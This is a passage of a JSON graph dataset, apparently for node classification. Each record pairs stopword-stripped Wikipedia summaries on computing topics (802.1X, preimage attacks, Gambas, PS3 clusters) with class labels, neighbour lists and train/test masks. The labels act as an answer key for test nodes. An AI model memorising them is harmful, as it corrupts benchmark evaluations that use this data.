    "label": 3,
    "text": "Ututo:ututo ututo linux distribution consisting entirely free software distribution named variety gecko found northern argentina ututo first fully free linux-based system recognized gnu project founder gnu project richard stallman formerly endorsed distribution nearly exclusively used personal computer switched gnewsense later trisquel ututo first released 2000 diego saravia national university salta argentina one first live cd distributions world first linux distribution argentina ututo carried simusol system simulate solar energy projects ututo simple install need configuration automatically detected hardware machine asked move mouse time distribution worked way 2002 ututo-r created offered possibility operating like software router version created marcos zapata used buenos aires public schools 2004 ututo-e project born swiftly becoming important derivative ututo project started daniel olivera 2006 ututo declared national interest argentine chamber deputies ututo xs current stable version ututo ututo xs compiled using gentoo linux ebuilds emerge software documentation spanish emergence xs series many new features added including faster system installer ututo used different hardware projects ifreetablet pablo manuel rizzo designed package management system ututo-get modelled debian apt however gentoo-based distros ututo compatible portage ututo different binaries optimized different intel amd processors releases since 2012 distribution considered dormant ututo ul ubuntu-libre current developed version ututo ututo ul utilize ubuntu distro base nonfree software removed usual ututo project linux-libre kernel 2017 original idea distributing simusol system simulate solar energy projects returned heart project tux machines reviewed utoto 2006",
    "neighbors": [
      5380,
      8837,
      7435,
      4493,
      10127,
      2321,
      10257,
      5397,
      4887,
      10394,
      10016,
      673,
      3618,
      3745,
      10530,
      9253,
      10149,
      4775,
      11305,
      7854,
      304,
      2864,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6899,
    "label": 4,
    "text": "Paedophile_Unit:paedophile unit paedophile unit branch metropolitan police service child abuse investigation command based scotland yard london england operates manufacture distribution child pornography online child grooming predatory paedophiles online organised crime associated unit subject series bbc television programmes concerning hunt britain paedophiles subject record 23,000 calls bbc audience line responsible final break-up advocacy group called paedophile information exchange paedophile unit works conjunction hi-tech crime unit examine computers used suspected offenders including computers used public areas via remote connections use technology identify arrest suspects referred proactive policing paedophile unit began life early 1960s obscene publications public morals branch although name shortened 1990 obscene publications branch opb common name however even among police hierarchy always obscene publications squad ops often colloquially known porn squad dirty squad set part clubs vice unit following passing obscene publications act 1959 originally operated pornography restrictions adult hardcore pornography began effectively rendered unenforceable advent internet unit restructured 1995 focus solely child sex offences renamed paedophile child pornography unit responsibility future investigation adult pornography transferred directly 1 area clubs vice unit charing cross police station originally part criminal investigation department transferred uniformed branch november 1972 revealed officers taking bribes pornography industry several later jailed corruption offences although staffed uniformed officers although continued usually operate plain clothes detectives initially continued part serious crime squad c1 department cid although 1990 part territorial operations to13 1993 returned cid control allowing officers use detective prefix front ranks became part so1 4 international organised crime branch specialist operations reorganisation 1995 became part organised crime group officer charge chief inspector 1972 superintendent thereafter assisted inspector number sergeants constables 1993 sixteen police officers ten civilian staff responsible administration storing evidence along officers viewing assessing material 1995 newsreader julia somerville partner arrested unit took nude pictures somerville daughter bath development boots later released without charge crime committed",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6900,
    "label": 7,
    "text": "Nvidia_GameWorks:nvidia gameworks nvidia gameworks middleware software suite developed nvidia visual fx physx optix sdks provide wide range enhancements pre-optimised nvidia gpus gameworks distributed form compiled dlls rather traditional source code competing solution development amd gpuopen announced free open-source software mit license march 2016 nvidia made source code gameworks available github nvidia gameworks consists several main components addition suite contains sample code directx opengl developers well tools debugging profiling optimization android development gameworks criticized proprietary closed nature competing gpu manufacturers amd intel unable properly optimize nvidia libraries hardware due developers allowed see code necessary properly optimize products amd chief gaming scientist richard huddy claimed developers use gameworks contractually forbidden work amd also claims gameworks adds specific performance-crippling effects older nvidia cards unnecessary tessellation marginally affects recent cards 2014 amd considering making open source gameworks competitor released gpuopen december 2015",
    "neighbors": [
      3585,
      3203,
      8454,
      2826,
      3210,
      9489,
      5914,
      11306,
      7086,
      7983,
      9774,
      8122,
      8514,
      7111,
      2635,
      11221,
      4182,
      5083,
      2525,
      8185,
      2277,
      8937,
      11630,
      1776,
      2293,
      2937,
      1916,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 6901,
    "label": 7,
    "text": "Software_Shelf_International:software shelf international software shelf international multinational corporation headquartered clearwater florida develops manufactures licenses supports range software programming services predominantly related business institutional printing print management data recovery software shelf established 1994 silicon valley redwood city california reseller distributor enterprise tools north american business markets company began develop line software programs utilities including print manager plus focused environmentally conscious sustainable business software solutions company developed first all-software solution reduce escalating ink paper hardware waste business academic institutional environment company currently maintains offices west sussex england menlo park california",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6902,
    "label": 4,
    "text": "Need_to_know:need know term need know used government organizations particularly related military espionage describes restriction data considered sensitive need-to-know restrictions even one necessary official approvals security clearance access certain information one would given access information read clandestine operation unless one specific need know access information must necessary one conduct one official duties term also includes anyone people knowledge deemed necessary share security mechanisms aim make difficult unauthorized access occur without inconveniencing legitimate access need-to-know also aims discourage browsing sensitive material limiting access smallest possible number people battle normandy 1944 example need-to-know restriction though thousands military personnel involved planning invasion small number knew entire scope operation rest informed data needed complete small part plan true trinity project first test nuclear weapon 1945 like security measures need know misused persons wish refuse others access information hold attempt increase personal power prevent unwelcome review work prevent embarrassment resulting actions thoughts need know also invoked hide extra-legal activities may considered necessary use detrimental abuse policy considered different perspectives need know detrimental workers efficiency speed computations ibm mechanical calculators los alamos dramatically increased calculators operators told numbers meant discretionary access control mechanisms operating systems used enforce need know case owner file determines whether another person access need know often concurrently applied mandatory access control schemes lack official approval clearance may absolutely prohibit person accessing information need know subjective assessment mandatory access control schemes also audit accesses order determine need know violated term also used concept graphical user interface design computers controlling complex equipment airplanes usage many different pieces data dynamically competing finite user interface space safety-related messages given priority",
    "neighbors": [
      10442,
      2190,
      7983,
      10835,
      4404,
      10580,
      3480,
      10170,
      2779,
      3516
    ],
    "mask": "Test"
  },
  {
    "node_id": 6903,
    "label": 4,
    "text": "Tactical_Network_Solutions:tactical network solutions tactical network solutions maryland-based information security company specializing 802.11 wi-fi protected setup wps wps exploitation tool released open source community vulnerability wps publicly disclosed stefan viehbock december 27 2011",
    "neighbors": [
      5373
    ],
    "mask": "Train"
  },
  {
    "node_id": 6904,
    "label": 4,
    "text": "IEEE_802.1X:ieee 802.1x ieee 802.1x ieee standard port-based network access control pnac part ieee 802.1 group networking protocols provides authentication mechanism devices wishing attach lan wlan ieee 802.1x defines encapsulation extensible authentication protocol eap ieee 802 known eap lan eapol eapol originally designed ieee 802.3 ethernet 802.1x-2001 clarified suit ieee 802 lan technologies ieee 802.11 wireless fiber distributed data interface iso 9314-2 802.1x-2004 eapol protocol also modified use ieee 802.1ae macsec ieee 802.1ar secure device identity devid 802.1x-2010 support service identification optional point point encryption local lan segment 802.1x authentication involves three parties supplicant authenticator authentication server supplicant client device laptop wishes attach lan/wlan term 'supplicant also used interchangeably refer software running client provides credentials authenticator authenticator network device provides data link client network allow block network traffic two ethernet switch wireless access point authentication server typically trusted server receive respond requests network access tell authenticator connection allowed various settings apply client connection setting authentication servers typically run software supporting radius eap protocols cases authentication server software may running authenticator hardware authenticator acts like security guard protected network supplicant i.e. client device allowed access authenticator protected side network supplicant identity validated authorized 802.1x port-based authentication supplicant must initially provide required credentials authenticator specified advance network administrator could include user name/password permitted digital certificate authenticator forwards credentials authentication server decide whether access granted authentication server determines credentials valid informs authenticator turn allows supplicant client device access resources located protected side network eapol operates data link layer ethernet ii framing protocol ethertype value 0x888e 802.1x-2001 defines two logical port entities authenticated port—the controlled port uncontrolled port controlled port manipulated 802.1x pae port access entity allow authorized state prevent unauthorized state network traffic ingress egress to/from controlled port uncontrolled port used 802.1x pae transmit receive eapol frames 802.1x-2004 defines equivalent port entities supplicant supplicant implementing 802.1x-2004 may prevent higher level protocols used content authentication successfully completed particularly useful eap method providing mutual authentication used supplicant prevent data leakage connected unauthorized network typical authentication procedure consists windows xp windows vista windows 7 support 802.1x network connections default windows 2000 support latest service pack sp4 wired connections windows mobile 2003 later operating systems also come native 802.1x client open source project known open1x produces client xsupplicant client currently available linux windows main drawbacks open1x client provide comprehensible extensive user documentation fact linux vendors provide package general wpa_supplicant used 802.11 wireless networks wired networks support wide range eap types iphone ipod touch support 802.1x release ios 2.0 android support 802.1x since release 1.6 donut chrome os supported 802.1x since mid-2011 mac os x offered native support since 10.3 avenda systems provides supplicant windows linux mac os x also plugin microsoft nap framework avenda also offers health checking agents windows defaults responding 802.1x authentication requests 20 minutes failed authentication cause significant disruption clients block period configured using hkey_local_machine\\software\\microsoft\\dot3svc\\blocktime dword value hkey_local_machine\\software\\microsoft\\wlansvc\\blocktime wireless networks registry entered minutes hotfix required windows xp sp3 windows vista sp2 make period configurable wildcard server certificates supported eaphost windows component provides eap support operating system implication using commercial certification authority individual certificates must purchased windows xp major issues handling ip address changes result user-based 802.1x authentication changes vlan thus subnet clients microsoft stated back port sso feature vista resolves issues users logging roaming profiles hotfix must downloaded installed authenticating via peap peap-mschapv2 windows vista based computers connected via ip phone may authenticate expected result client placed wrong vlan hotfix available correct windows 7 based computers connected via ip phone may authenticate expected result client placed wrong vlan hotfix available correct windows 7 respond 802.1x authentication requests initial 802.1x authentication fails cause significant disruption clients hotfix available correct enterprises deploying rolling operating systems remotely worth noting windows pe native support 802.1x however support added winpe 2.1 winpe 3.0 hotfixes available microsoft although full documentation yet available preliminary documentation use hotfixes available via microsoft blog linux distributions support 802.1x via wpa_supplicant desktop integration like networkmanager eduroam international roaming service mandates use 802.1x authentication providing network access guests visiting eduroam enabled institutions bt british telecom plc employs identity federation authentication services delivered wide variety industries governments devices support 802.1x authentication examples include network printers ethernet-based electronics like environmental sensors cameras wireless phones devices used protected network environment alternative mechanisms must provided authenticate one option would disable 802.1x port leaves port unprotected open abuse another slightly reliable option use mab option mab configured port port first try check connected device 802.1x compliant reaction received connected device try authenticate aaa server using connected device mac address username password network administrator must make provisions radius server authenticate mac-addresses either adding regular users implementing additional logic resolve network inventory database many managed ethernet switches offer options summer 2005 microsoft steve riley posted article detailing serious vulnerability 802.1x protocol involving man middle attack summary flaw stems fact 802.1x authenticates beginning connection authentication possible attacker use authenticated port ability physically insert perhaps using workgroup hub authenticated computer port riley suggests wired networks use ipsec combination ipsec 802.1x would secure eapol-logoff frames transmitted 802.1x supplicant sent clear contain data derived credential exchange initially authenticated client therefore trivially easy spoof shared media used part targeted dos wired wireless lans eapol-logoff attack malicious third party access medium authenticator attached repeatedly sends forged eapol-logoff frames target device mac address authenticator believing targeted device wishes end authentication session closes target authentication session blocking traffic ingressing target denying access network 802.1x-2010 specification began 802.1af addresses vulnerabilities previous 802.1x specifications using macsec ieee 802.1ae encrypt data logical ports running top physical port ieee 802.1ar secure device identity devid authenticated devices stopgap enhancements widely implemented vendors extended 802.1x-2001 802.1x-2004 protocol allowing multiple concurrent authentication sessions occur single port prevents traffic devices unauthenticated mac addresses ingressing 802.1x authenticated port stop malicious device snooping traffic authenticated device provides protection mac spoofing eapol-logoff attacks ietf-backed alternative protocol carrying authentication network access pana also carries eap although works layer 3 using udp thus tied 802 infrastructure",
    "neighbors": [
      5892,
      7045,
      8708,
      9732,
      7049,
      4490,
      8080,
      9744,
      11413,
      5270,
      10905,
      3742,
      5671,
      9640,
      6187,
      172,
      4396,
      10924,
      6064,
      434,
      3762,
      2996,
      823,
      5433,
      6586,
      7865,
      11321,
      5439,
      1346,
      3780,
      8391,
      4552,
      8266,
      10058,
      2904,
      10332,
      7901,
      8670,
      5472,
      9442,
      4581,
      5863,
      2027,
      9963,
      10863,
      5490,
      1779,
      7411,
      11125,
      8828,
      3838,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6905,
    "label": 4,
    "text": "Preimage_attack:preimage attack cryptography preimage attack cryptographic hash functions tries find message specific hash value cryptographic hash function resist attacks preimage set possible inputs context attack two types preimage resistance compared collision resistance computationally infeasible find two distinct inputs x x ′ hash output i.e. collision resistance implies second-preimage resistance guarantee preimage resistance conversely second-preimage attack implies collision attack trivially since addition x ′ x already known right start definition ideal hash function fastest way compute first second preimage brute-force attack n -bit hash attack time complexity 2 considered high typical output size n 128 bits complexity best achieved adversary hash function considered preimage-resistant however general result quantum computers perform structured preimage attack 2 also implies second preimage thus collision attack faster preimage attacks found cryptanalysing certain hash functions specific function significant preimage attacks already discovered yet practical practical preimage attack discovered would drastically affect many internet protocols case practical means could executed attacker reasonable amount resources example preimaging attack costs trillions dollars takes decades preimage one desired hash value one message practical one costs thousand dollars takes weeks might practical currently known practical almost-practical attacks md5 sha-1 collision attacks general collision attack easier mount preimage attack restricted set value two values used collide time complexity collision attack contrast 2 improve resistance collision attacks double hashing good solution case someone discovers preimage attack first hash bitcoin system uses double hashed sha256 common way slow hashing searches 2000s",
    "neighbors": [
      8674,
      7556,
      4389,
      11639,
      6954,
      3984,
      9170,
      2357,
      1941,
      3477,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 6906,
    "label": 9,
    "text": "Wally_Feurzeig:wally feurzeig wallace wally feurzeig june 10 1927 – january 4 2013 co-inventor seymour papert cynthia solomon programming language logo well-known researcher artificial intelligence ai wallace feurzeig born chicago parents mandel pauline feurzeig earned bachelor philosophy bachelor science degrees university chicago master science degree illinois institute technology worked argonne national laboratory university chicago joining bolt beranek newman bbn early 1960s bolt beranek newman become major center computer science research innovative applications 1962 wally feurzeig joined firm work newly available facilities artificial intelligence department one earliest ai organizations colleagues actively engaged pioneering ai work computer pattern recognition natural-language understanding automated theorem proving lisp language development robot problem solving much work done collaboration distinguished researchers massachusetts institute technology mit marvin minsky john mccarthy regular bbn consultants early 1960s groups bbn original work cognitive science instructional research man-computer communication first work knowledge representation reasoning semantic networks question answering interactive computer graphics computer-aided instruction cai actively underway j. c. r. licklider spiritual scientific leader much work championing cause on-line interaction era almost computing done via batch processing wally initial focus expanding intellectual abilities extant teaching systems led first intelligent cai system mentor employed production rules support problem-solving interactions medical diagnosis decision-making domains 1965 wally organized bbn educational technology department development computer methods improve learning teaching focus work shifted investigating programming languages educational environments shift partly due two recent technological advances invention computer time-sharing development first high-level conversational programming language idea sharing computer cycles among autonomous users working simultaneously stirred imagination cambridge 1963 1964 bbn mit teams raced first realize concept bbn winning days holding first successful demonstration computer time-sharing 1964 bbn initial system designed sheldon boilen supported five simultaneous users dec pdp-1 sharing one cathode-ray tube crt screen output seeing dynamic displays several distinct programs simultaneously asynchronously time tune breathtaking experience time sharing made feasible economic use remote distributed terminals opened possibilities interactive computer use schools bbn recently implemented telcomp one new breed high-level interactive programming languages telcomp dialect joss first conversational interpreted language developed 1962–63 cliff shaw rand corporation syntax similar language basic yet appeared like basic telcomp fortran-derived language originally designed numerical computational applications shortly telcomp created wally decided introduce children tool teach mathematics 1965–66 u.s. office education support explored use auxiliary resource eight elementary secondary schools served bbn time-sharing system students introduced telcomp worked standard arithmetic algebra trigonometry problems writing telcomp programs project strongly confirmed expectations use interactive computation high-level interpretive language would highly motivating students wally collaborators research daniel bobrow richard grant cynthia solomon bbn consultant seymour papert recently arrived mit jean piaget institute geneva idea programming language expressly designed children arose directly project group realized extant languages designed computation generally lacked facilities nonnumeric symbolic manipulation current languages inappropriate education respects also often employed extensive data type declarations got way students expressive impetus serious deficiencies control structures programs lacked procedural constructs facilities dynamic definition execution well-developed articulate debugging diagnostic editing facilities essential educational uses",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      75,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      10400,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      11538,
      5395,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      1343,
      11075,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7048,
      7562,
      10641,
      6556,
      6047,
      1952,
      10145,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 6907,
    "label": 4,
    "text": "Kenneth_P._Weiss:kenneth p. weiss kenneth p. weiss american entrepreneur human factors engineer inventor invented securid card trademark rsa security weiss holds bachelor degree university bridgeport continued graduate studies research university new hampshire temple university received doctorate neotarian fellowship founded security dynamics 1984 served ceo 1986 chairman board cto 1996 initiated purchase 1993 rsa security small encryption company working internet commerce 1994 security dynamics went public nasdaq stock exchange weiss company largest individual shareholder.. company developed sold securid card rsa encryption technologies computer security electronic commerce identity authentication resigned 1996 citing policy disagreements directors company operations policies company achieved market capitalization 4 billion 2006 company purchased emc corporation 1994 published article enumerating regarded seven significant flaws clipper chip initiative weiss ’ position article contributed abandonment multibillion-dollar u.s. government program weiss asserted would allowed electronic eavesdropping us citizen surveillance chip embedded private electronic communication equipment weiss taught penn state university bridgeport nasson college king college chairman psychology department seven years professor textbook author editorial board journal information systems security chairman identification authentication division american defense preparedness association committee computer security also member technology ethics committee information systems security association issa currently weiss founder ceo universal secure registry usr company based newton massachusetts develops technologies identification authentication mobile phone applications holds 22 u.s. patents well foreign patents weiss member american association advancement science honor societies sigma xi psi chi weiss also involved philanthropic work cape ann symphony rockport chamber music society gloucester stage co. gloucester schooner festival historical meeting house restoration cape ann historical association perfect storm foundation addison gilbert beverly hospitals lahey clinic political action groups",
    "neighbors": [
      5433,
      2154,
      2558,
      11175
    ],
    "mask": "Test"
  },
  {
    "node_id": 6908,
    "label": 6,
    "text": "IArchiver:iarchiver iarchiver software utility handling file archives apple macintosh renamed rucksack iarchiver designed universal tool working archives used create extract convert large number common legacy archive formats drag-and-drop interface iarchiver developed currently maintained dare creative ltd software company based vienna austria",
    "neighbors": [
      2755,
      965,
      10470,
      10857,
      6797,
      7983,
      722,
      950,
      823,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 6909,
    "label": 3,
    "text": "PlayStation_3_cluster:playstation 3 cluster considerable computing capability playstation 3 cell microprocessors raised interest using multiple networked ps3s various tasks require affordable high-performance computing national center supercomputing applications already built cluster based playstation 2 terra soft solutions version yellow dog linux playstation 3 sells ps3s linux pre-installed single units 8 32 node clusters addition rapidmind pushing stream programming package ps3 january 3 2007 dr. frank mueller associate professor computer science north carolina state university clustered 8 ps3s mueller commented 256 mb system ram limitation particular application considering attempting retrofit ram software includes fedora core 5 linux ppc64 mpich2 openmp v2.5 gnu compiler collection cellsdk 1.1 summer 2007 gaurav khanna professor physics department university massachusetts dartmouth independently built message-passing based cluster using 8 ps3s running fedora linux cluster built support sony computer entertainment first cluster generated published scientific results dubbed ps3 gravity grid ps3 cluster performs astrophysical simulations large supermassive black holes capturing smaller compact objects khanna claims cluster performance exceeds 100+ intel xeon core based traditional linux cluster simulations ps3 gravity grid gathered significant media attention 2007 2008 2009 2010 khanna also created diy website build clusters accessible general public november 2010 air force research laboratory created powerful supercomputer nicknamed condor cluster connecting together 1,760 sony ps3s include 168 separate graphical processing units 84 coordinating servers parallel array capable performing 500 trillion floating-point operations per second 500 tflops built condor cluster 33rd largest supercomputer world would used analyse high definition satellite imagery even single ps3 used significantly accelerate computations marc stevens arjen k. lenstra benne de weger demonstrated using single ps3 perform md5 bruteforce hours say essentially single playstation 3 performs like cluster 30 pcs price one november 2007 march 22 2007 sce stanford university expanded folding home project ps3 along thousands pcs already joined internet ps3 owners able lend computing power game systems study improper protein folding associated diseases alzheimer parkinson huntington cystic fibrosis several forms cancer software included part 1.6 firmware update march 22 2007 set run manually automatically ps3 idle cross media bar processed information sent back project central servers internet processing power ps3 users greatly contributing folding home project ps3s third nvidia amd gpus terms teraflops contributed march 2011 million ps3 owners allowed folding home software run systems 27,000 currently active total 8.1 petaflops comparison world powerful supercomputer november 2010 tianhe-ia peak performance 2.56 petaflops 2,566 teraflops latest report stated folding home passed 5 native petaflop mark 767 teraflops supplied playstation 3 clients computational biochemistry biophysics lab barcelona launched distributed computing project called ps3grid project expected run sixteen times faster equivalent project standard pc like distributed computing projects designed run computer idle ehits lightning first virtual screening molecular docking software ps3 released simbiosys reported bio-it world july 2008 application runs 30x faster single ps3 regular single cpu pc also runs ps3 clusters achieving screening huge chemical compound libraries matter hours days rather weeks used standard expectation march 28 2010 sony announced would disabling ability run operating systems v3.21 update due security concerns otheros update would affect existing supercomputing clusters due fact connected psn would forced update however would make replacing individual consoles compose clusters difficult impossible since newer models v3.21 higher would support linux installation directly caused end ps3 common use clustered computing though projects like condor still created older ps3 units come online april 1 2010 update released possible workaround might replace damaged tsop older ie ps3 fat consoles non-fatal hardware failures defective shaders ylod combined x-ray bga rework affected memory chips would acceptable applications principle would custom hardware dmca classed reverse engineering additional modifications would include upgrading thermal profile ie larger fan/more voltage replacing tsop completely socket surplus 256mb xd card installed place hackers already done development purposes",
    "neighbors": [
      9472,
      643,
      7556,
      785,
      7699,
      7963,
      10780,
      6815,
      9508,
      5798,
      6311,
      6184,
      2345,
      9126,
      684,
      4909,
      6268,
      306,
      7218,
      8501,
      823,
      6072,
      8120,
      10111,
      5948,
      4286,
      1985,
      2113,
      8514,
      5956,
      6781,
      4423,
      1480,
      1866,
      8523,
      3025,
      6738,
      4308,
      342,
      344,
      2264,
      859,
      1115,
      2140,
      731,
      3677,
      4060,
      11487,
      4194,
      5090,
      9445,
      7142,
      8937,
      10985,
      4587,
      6004,
      2293,
      1784,
      7802,
      3323,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 6910,
    "label": 9,
    "text": "Gambas:gambas gambas name object-oriented dialect basic programming language well integrated development environment accompanies designed run linux unix-like computer operating systems name recursive acronym gambas almost means basic gambas also word prawns spanish french portuguese languages project logos derived gambas developed french programmer benoît minisini first release coming 1999 benoît grown basic language decided make free software development environment could quickly easily make programs user interfaces gambas 1.x versions featured interface made several different separate windows forms ide dialogues similar fashion interface gimp could also develop applications using qt oriented towards development applications kde last release 1.x versions gambas 1.0.19 first 2.x versions released january 2 2008 three four years development featured major redesign interface forms functions embedded single window well changes gambas syntax although part code compatibility kept featured major updates existing gambas components well addition new ones new components could use gtk+ sdl drawing utilize opengl acceleration gambas 2.x versions load run gambas 1.x projects occasional incompatibilities next major iteration gambas 3.x versions released december 31 2011 2015 benchmark published gambas website showed gambas 3.8.90 scripting faster varying degrees perl 5.20.2 outdated 2.7.10 version python many tests gambas designed build graphical programs using qt currently qt 4.x 5.x gtk+ toolkit gtk 3.x also supported 3.6.0 gambas ide written gambas gambas includes gui designer aid creating user interfaces also make command line applications gambas runtime environment needed run executables functionality provided variety components selected provide additional features drawing provided either qt gtk+ toolkits additional component designed switch drawing also provided simple directmedia layer currently version 1.x 2.x support works also utilized audio playback separate sound component component openal specification also added gpu acceleration support available opengl component well hardware functionally provided various components also components handling specialized tasks gambas developers also use databases mysql postgresql build kde qt gnome gtk+ applications dcop translate visual basic programs gambas run linux build network solutions create cgi web applications ide also includes tool creation installation packages supporting gnu autotools slackpkg pacman rpm debs latter two tailored specific distributions fedora/rhel/centos mageia mandriva opensuse debian ubuntu/mint gambas since version 3.2 ide integrated profiler started use just-in-time compilation technology gambas intended provide similar experience developing microsoft visual basic free software clone popular proprietary program author gambas makes clear similarities visual basic syntax basic programs integrated development environment gambas written start development environment seeks improve formula object model class represented file archiver package program inspired java programming language gambas intended alternative former visual basic developers decided migrate linux also important distinctions gambas visual basic one notable example gambas array indexes always start 0 whereas visual basic indexes start 0 1 gambas also supports += -= shorthand found classic visual basic features visual basic .net however several programs many forms example code written using gambas freecode formerly freshmeat listed 23 applications developed using gambas gambas wiki listed 70 several specialized sites list gambas applications code even gambas written application named gambas3 showcase acts software center download install gambas 3 applications several community sites including community forums mailing lists also exist gambas gambas included repositories number linux distributions debian fedora mandriva linux ubuntu microsoft windows version gambas run cygwin environment although version significantly less tested linux counterparts command-line cooperative linux derivatives also used well specialized linux virtual machines independent contributor françois gallo also worked porting gambas 3.x mac os x freebsd based using local versions x11 system gambas version 3.2 run raspberry pi offers just-in-time compilation november 2013 future portability gambas discussed listing main concerns linux kernel features utilized interpreter components using linux specific software libraries primarily x11-tying qt gtk+ desktop integration components however partly due need upgrade newer toolkits gtk 3 added 3.6.0 qt 5 3.8.0 future versions would less x11 tied making projects like cygwin utterly native versions platforms possible benoît minisini stated intended encapsulate x11 specific code aid attempt replace x11 support desktop component moved component 3.6.0 october 27 2016 screenshot setup guide released main page running gambas fully cygwin including components graphical toolkits complete ide relevant patches mainlined version 3.9.2 replaces prior recommended method using freenx forwarding linux server hello world program graphical user interface public sub main end program computes 100-term polynomial 500000 times repeats ten times used benchmarking private sub test x float float end public sub main end",
    "neighbors": [
      6154,
      7691,
      22,
      5663,
      546,
      4136,
      5677,
      11315,
      1591,
      4160,
      4674,
      4171,
      1101,
      92,
      10851,
      5733,
      9320,
      5747,
      6778,
      3718,
      6797,
      11412,
      3736,
      9881,
      3233,
      7343,
      7355,
      7870,
      6338,
      712,
      5833,
      8909,
      219,
      10971,
      8429,
      10478,
      10480,
      759,
      1805,
      9997,
      786,
      4885,
      5397,
      797,
      5925,
      8494,
      303,
      2864,
      7983,
      823,
      1849,
      315,
      7486,
      2368,
      8524,
      847,
      3413,
      1879,
      2915,
      8554,
      11135,
      3969,
      8582,
      5511,
      3481,
      8609,
      10658,
      11683,
      8101,
      10666,
      6583,
      963,
      8644,
      5067,
      975,
      10192,
      8147,
      11219,
      11229,
      9188,
      4069,
      5096,
      1513,
      11243,
      2541,
      2045,
      10750,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 6911,
    "label": 2,
    "text": "Dynamic_video_memory_technology:dynamic video memory technology dynamic video memory technology dvmt allows dynamic allocation system memory use video memory ensure efficient use available resources maximum 2d/3d graphics performance amount video memory dependent upon amount pre-allocated memory set system plus something called dvmt dvmt name implies dynamically allocates system memory use video memory ensure efficient use available resources maximum 2d/3d graphics performance technology used intel fulfill needs graphically demanding games",
    "neighbors": [
      704,
      9959,
      5386,
      6730,
      7755,
      4622,
      499,
      1972,
      8795,
      6971,
      1085,
      3294
    ],
    "mask": "Test"
  },
  {
    "node_id": 6912,
    "label": 9,
    "text": "Jeremy_Ashkenas:jeremy ashkenas jeremy ashkenas computer programmer known creation co-creation coffeescript livescript programming languages respectively backbone.js javascript framework underscore.js javascript library ashkenas speaker numerous conferences events worked graphics department new york times september 2015 returned september 2016 shared 2015 gerald loeb award images/graphics/interactives 2018 works observable company founded mike bostock aims create interactive notebooks",
    "neighbors": [
      2804,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 6913,
    "label": 7,
    "text": "Legacy-free_PC:legacy-free pc legacy-free pc type personal computer lacks floppy drive legacy ports industry standard architecture isa bus sometimes internal expansion bus according microsoft basic goal requirements operating system devices end users detect presence following isa slots devices legacy floppy disk controller fdc ps/2 serial parallel game ports legacy ports usually replaced universal serial bus usb ports usb adapter may used older device must connected pc lacking ports according 2001 edition microsoft pc system design guide legacy-free pc must able boot usb device away older usually bulky ports devices allows legacy-free pc much compact earlier systems many fall nettop one form factor netbooks ultrabooks could also considered portable form legacy-free pc legacy-free pcs difficult upgrade traditional beige box pc typically expected replaced completely become obsolete many legacy-free pcs include modern devices may used replace ones omitted memory card reader replacing floppy drive first decade 21st century progressed legacy-free pc went mainstream legacy ports removed commonly available computer systems form factors however ps/2 keyboard connector still retains use offer uses e.g implementation n-key rollover offered usb apple imac g3 first example legacy-free pc drawing much criticism lack legacy peripherals floppy drive apple desktop bus adb connector however success popularized usb november 1999 july 2000 dell webpc early less-successful wintel legacy-free pc legacy-free pcs introduced around 2000 prevalence usb broadband internet made many older ports devices obsolete largely took form low-end consumer systems motivation making computers less expensive easier use stable manageable dell studio hybrid asus eee box msi wind pc examples later more-successful intel-based legacy-free pcs apple introduced apple modem october 12 2005 removed internal 56k modem new computers macbook air introduced january 29 2008 also omits built-in superdrive wired ethernet connectivity available mac computers sold time superdrive would later removed macs end 2016 wired ethernet would later removed macbook models relaunched macbook 2015 dropped features magsafe charging port secure digital sd memory card reader kept two types ports 3.5mm audio jack usb 3.1 type-c port configuration later found way macbook pro 2016 difference two four usb ports included instead one addition macbook pro except entry-level model replaced function keys touch bar changes led criticism many users utilised features apple removed",
    "neighbors": [
      4228,
      8044,
      5681,
      6129,
      533,
      5368
    ],
    "mask": "None"
  },
  {
    "node_id": 6914,
    "label": 3,
